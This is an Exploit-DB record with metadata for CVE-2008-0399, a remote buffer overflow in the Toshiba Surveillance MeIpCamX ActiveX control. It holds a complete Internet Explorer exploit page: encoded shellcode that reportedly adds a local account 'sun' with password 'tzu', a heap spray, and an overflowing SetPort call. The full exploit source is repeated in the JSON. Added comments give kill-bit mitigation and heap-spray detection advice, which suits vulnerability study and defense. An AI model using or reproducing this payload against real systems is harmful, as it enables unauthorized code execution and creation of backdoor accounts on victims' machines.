ID EDB-ID:4946
Type exploitdb
Reporter rgod
Modified 2008-01-20T00:00:00
Description
Toshiba Surveillance (MeIpCamX.DLL 1.0.0.4) remote buffer overflow (BOF) exploit for CVE-2008-0399. Remote exploit for the Windows platform.
<!--
Toshiba Surveillance (Surveillix) RecordSend Class (MeIpCamX.DLL 1.0.0.4) remote
buffer overflow exploit (IE7/xpsp2)
a demo camera: http://wb02-demo.surveillixdvrsupport.com/Ctl/index.htm?Cus?Audio
codebase: http://wb02-demo.surveillixdvrsupport.com/Ctl/MeIpCamX.cab
rgod-tsid-pa-he-ru-ka
-
stay tuned with us ...
http://retrogod.altervista.org/join.html
security feeds, radio streams, techno/drum & bass stations to come
-->
<html>
<!--
  Proof-of-concept page for CVE-2008-0399: it loads the RecordSend ActiveX
  control from MeIpCamX.DLL and calls one of its methods from script.

  The object element below asks Internet Explorer to instantiate the control
  registered under the given classid and exposes it to script under the id
  RecordSend. Nothing on this page works unless that control is installed
  and the browser allows it to be instantiated and scripted.

  Defensive notes:
  * Mitigation: remove the control, or set the Internet Explorer kill bit for
    this CLSID so the browser refuses to instantiate it.
  * Detection: web content that references this classid together with calls
    to SetPort or SetIpAddress is worth flagging on proxies and in page
    inspection tooling.
-->
<object classid='clsid:AD315309-EA00-45AE-9E8E-B6A61CE6B974' id='RecordSend' />
</object>
<script language="javascript">
///add su one, user: sun pass: tzu
// NOTE(review): the author's comment above says the payload adds an account
// (user "sun"); the bytes are not decoded here, so treat that as unverified.
// If accurate, an unexpected local account of that name is a host-side
// indicator worth checking on machines that had the control installed.
// unescape() turns each %uXXXX escape into one 16-bit string unit, so the
// payload is carried as an ordinary JavaScript string.
shellcode = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949" +
"%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a" +
"%u5058%u4230%u4231%u6b41%u4141%u3255%u4241%u3241" +
"%u4142%u4230%u5841%u3850%u4241%u6d75%u6b39%u494c" +
"%u5078%u3344%u6530%u7550%u4e50%u716b%u6555%u6c6c" +
"%u614b%u676c%u3175%u6568%u5a51%u4e4f%u306b%u564f" +
"%u4c78%u414b%u774f%u4450%u4841%u576b%u4c39%u664b" +
"%u4c54%u444b%u7841%u466e%u6951%u4f50%u6c69%u6b6c" +
"%u6f34%u3330%u6344%u6f37%u6a31%u646a%u474d%u4871" +
"%u7842%u4c6b%u6534%u716b%u5144%u6334%u7434%u5835" +
"%u6e65%u736b%u646f%u7364%u5831%u756b%u4c36%u644b" +
"%u624c%u6c6b%u634b%u656f%u574c%u7871%u4c6b%u774b" +
"%u4c6c%u464b%u7861%u4f6b%u7379%u516c%u3334%u6b34" +
"%u7073%u4931%u7550%u4e34%u536b%u3470%u4b70%u4f35" +
"%u7030%u4478%u4c4c%u414b%u5450%u4c4c%u624b%u6550" +
"%u6c4c%u6e6d%u626b%u6548%u6858%u336b%u6c39%u4f4b" +
"%u4e70%u5350%u3530%u4350%u6c30%u704b%u3568%u636c" +
"%u366f%u4b51%u5146%u7170%u4d46%u5a59%u6c58%u5943" +
"%u6350%u364b%u4230%u7848%u686f%u694e%u3170%u3370" +
"%u4d58%u6b48%u6e4e%u346a%u464e%u3937%u396f%u7377" +
"%u7053%u426d%u6444%u756e%u5235%u3058%u6165%u4630" +
"%u654f%u3133%u7030%u706e%u3265%u7554%u7170%u7265" +
"%u5353%u7055%u5172%u5030%u4273%u3055%u616e%u4330" +
"%u7244%u515a%u5165%u5430%u526f%u5161%u3354%u3574" +
"%u7170%u5736%u4756%u7050%u306e%u7465%u4134%u7030" +
"%u706c%u316f%u7273%u6241%u614c%u4377%u6242%u524f" +
"%u3055%u6770%u3350%u7071%u3064%u516d%u4279%u324e" +
"%u7049%u5373%u5244%u4152%u3371%u3044%u536f%u4242" +
"%u6153%u5230%u4453%u5035%u756e%u3470%u506f%u6741" +
"%u7734%u4734%u4570");
// Heap-spray setup. bigblock starts as two 0x9090 units (x86 NOP bytes) and
// is doubled below until it is at least slackspace units long.
bigblock = unescape("%u9090%u9090");
// presumably an allowance for per-string allocator overhead (TODO confirm)
headersize = 20;
slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
// fillblock: exactly slackspace units of filler.
// block: the remainder of bigblock after slackspace units are set aside.
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
// Grow block until block.length + slackspace reaches 0x40000 string units.
while(block.length+slackspace<0x40000) block = block+block+fillblock;
// 444 strings, each filler followed by the payload, are stored in an array
// and so stay referenced for the rest of the script.
// Detection: a script that allocates hundreds of large, near-identical
// strings built from %u9090 filler matches common heap-spray heuristics.
memory = new Array();
for (i=0;i<444;i++){memory[i] = block+shellcode}
//thx to Solar Designer and metasploit crew, is always intended
// puf is 28 copies of the single character produced by unescape("%0e");
// it is the only argument passed to the control's SetPort method.
puf=""; for (i=0;i<28;i++){puf = puf + unescape("%0e")} //no more than 28, otherwise you fall in seh tricks
// CVE-2008-0399 covers both SetPort and SetIpAddress: the control is reported
// to overflow a buffer on long arguments. The fix belongs in the control
// (length-check the argument before copying it); until then, block the CLSID.
RecordSend.SetPort(puf); //SetIpAddress method is vulnerable too, check by yourself
</script>
</html>
# milw0rm.com [2008-01-20]
{"hash": "27f60e74cc46e2fc04126514df0ef13b841eaf8f33a20fe7a612afb0e2ab1aef", "id": "EDB-ID:4946", "lastseen": "2016-01-31T21:09:55", "enchantments": {"vulnersScore": 7.5}, "bulletinFamily": "exploit", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "edition": 1, "history": [], "type": "exploitdb", "sourceHref": "https://www.exploit-db.com/download/4946/", "description": "Toshiba Surveillance (MeIpCamX.DLL 1.0.0.4) Remote BOF Exploit. CVE-2008-0399. Remote exploit for windows platform", "title": "Toshiba Surveillance MeIpCamX.DLL 1.0.0.4 Remote BoF Exploit", "sourceData": "<!--\nToshiba Surveillance (Surveillix) RecordSend Class (MeIpCamX.DLL 1.0.0.4) remote\nbuffer overflow exploit (IE7/xpsp2)\n\na demo camera: http://wb02-demo.surveillixdvrsupport.com/Ctl/index.htm?Cus?Audio\ncodebase: http://wb02-demo.surveillixdvrsupport.com/Ctl/MeIpCamX.cab\n\nrgod-tsid-pa-he-ru-ka\n-\nstay tuned with us ...\nhttp://retrogod.altervista.org/join.html\nsecurity feeds, radio streams, techno/drum & bass stations to come\n-->\n<html>\n<object classid='clsid:AD315309-EA00-45AE-9E8E-B6A61CE6B974' id='RecordSend' />\n</object>\n<script language=\"javascript\">\n///add su one, user: sun pass: tzu\nshellcode = unescape(\"%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949\" +\n \"%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a\" +\n \"%u5058%u4230%u4231%u6b41%u4141%u3255%u4241%u3241\" +\n \"%u4142%u4230%u5841%u3850%u4241%u6d75%u6b39%u494c\" +\n \"%u5078%u3344%u6530%u7550%u4e50%u716b%u6555%u6c6c\" +\n \"%u614b%u676c%u3175%u6568%u5a51%u4e4f%u306b%u564f\" +\n \"%u4c78%u414b%u774f%u4450%u4841%u576b%u4c39%u664b\" +\n \"%u4c54%u444b%u7841%u466e%u6951%u4f50%u6c69%u6b6c\" +\n \"%u6f34%u3330%u6344%u6f37%u6a31%u646a%u474d%u4871\" +\n \"%u7842%u4c6b%u6534%u716b%u5144%u6334%u7434%u5835\" +\n \"%u6e65%u736b%u646f%u7364%u5831%u756b%u4c36%u644b\" +\n \"%u624c%u6c6b%u634b%u656f%u574c%u7871%u4c6b%u774b\" +\n 
\"%u4c6c%u464b%u7861%u4f6b%u7379%u516c%u3334%u6b34\" +\n \"%u7073%u4931%u7550%u4e34%u536b%u3470%u4b70%u4f35\" +\n \"%u7030%u4478%u4c4c%u414b%u5450%u4c4c%u624b%u6550\" +\n \"%u6c4c%u6e6d%u626b%u6548%u6858%u336b%u6c39%u4f4b\" +\n \"%u4e70%u5350%u3530%u4350%u6c30%u704b%u3568%u636c\" +\n \"%u366f%u4b51%u5146%u7170%u4d46%u5a59%u6c58%u5943\" +\n \"%u6350%u364b%u4230%u7848%u686f%u694e%u3170%u3370\" +\n \"%u4d58%u6b48%u6e4e%u346a%u464e%u3937%u396f%u7377\" +\n \"%u7053%u426d%u6444%u756e%u5235%u3058%u6165%u4630\" +\n \"%u654f%u3133%u7030%u706e%u3265%u7554%u7170%u7265\" +\n \"%u5353%u7055%u5172%u5030%u4273%u3055%u616e%u4330\" +\n \"%u7244%u515a%u5165%u5430%u526f%u5161%u3354%u3574\" +\n \"%u7170%u5736%u4756%u7050%u306e%u7465%u4134%u7030\" +\n \"%u706c%u316f%u7273%u6241%u614c%u4377%u6242%u524f\" +\n \"%u3055%u6770%u3350%u7071%u3064%u516d%u4279%u324e\" +\n \"%u7049%u5373%u5244%u4152%u3371%u3044%u536f%u4242\" +\n \"%u6153%u5230%u4453%u5035%u756e%u3470%u506f%u6741\" +\n \"%u7734%u4734%u4570\");\nbigblock = unescape(\"%u9090%u9090\");\nheadersize = 20;\nslackspace = headersize+shellcode.length;\nwhile (bigblock.length<slackspace) bigblock+=bigblock;\nfillblock = bigblock.substring(0, slackspace);\nblock = bigblock.substring(0, bigblock.length-slackspace);\nwhile(block.length+slackspace<0x40000) block = block+block+fillblock;\nmemory = new Array();\nfor (i=0;i<444;i++){memory[i] = block+shellcode}\n\n //thx to Solar Designer and metasploit crew, is always intended\n\npuf=\"\"; for (i=0;i<28;i++){puf = puf + unescape(\"%0e\")} //no more than 28, otherwise you fall in seh tricks\nRecordSend.SetPort(puf); //SetIpAddress method is vulnerable too, check by yourself\n</script>\n</html>\n\n# milw0rm.com [2008-01-20]\n", "objectVersion": "1.0", "cvelist": ["CVE-2008-0399"], "published": "2008-01-20T00:00:00", "osvdbidlist": ["40519"], "references": [], "reporter": "rgod", "modified": "2008-01-20T00:00:00", "href": "https://www.exploit-db.com/exploits/4946/"}
{"result": {"cve": [{"id": "CVE-2008-0399", "type": "cve", "title": "CVE-2008-0399", "description": "Multiple buffer overflows in Toshiba Surveillance (Surveillix) RecordSend ActiveX control (MeIpCamX.DLL 1.0.0.4) allow remote attackers to execute arbitrary code via long arguments to the (1) SetPort and (2) SetIpAddress methods.", "published": "2008-01-23T07:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-0399", "cvelist": ["CVE-2008-0399"], "lastseen": "2017-09-29T14:25:43"}]}}